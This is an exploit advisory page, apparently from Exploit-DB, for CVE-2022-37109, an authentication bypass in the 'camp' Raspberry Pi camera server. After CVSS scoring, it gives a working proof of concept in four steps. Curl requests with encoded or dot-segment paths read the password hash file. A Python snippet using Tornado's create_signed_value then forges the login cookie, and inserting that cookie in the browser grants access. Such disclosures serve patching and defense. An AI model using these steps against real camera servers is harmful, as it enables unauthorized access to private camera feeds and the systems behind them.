"camp" Raspberry Pi camera server 1.0 - Authentication Bypass

2023-03-2500:00:00

Elias Hohl

www.exploit-db.com

raspberry pi

authentication bypass

vulnerability

exploit

ubuntu 20.04

cve-2022-37109

server

sha-512

password hash

cookie-based authentication.

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.013 Low

EPSS

Percentile

85.6%

JSON

# Exploit Title: "camp" Raspberry Pi camera server 1.0 -  Authentication Bypass
# Date: 2022-07-25
# Exploit Author: Elias Hohl
# Vendor Homepage: https://github.com/patrickfuller
# Software Link: https://github.com/patrickfuller/camp
# Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-37109

"camp" Raspberry Pi camera server Authentication Bypass vulnerability

https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904

1. Start an instance of the "camp" server:
python3 server.py --require-login

2. Fetch the SHA-512 password hash using one of these methods:

curl http://localhost:8000/static/password.tx%74

OR

curl http://localhost:8000/static/./password.txt --path-as-is

OR

curl http://localhost:8000/static/../camp/password.txt --path-as-is

3. Execute the following python snippet (replace the hash with the hash you received in step 2).

from tornado.web import create_signed_value
import time
print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))

4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.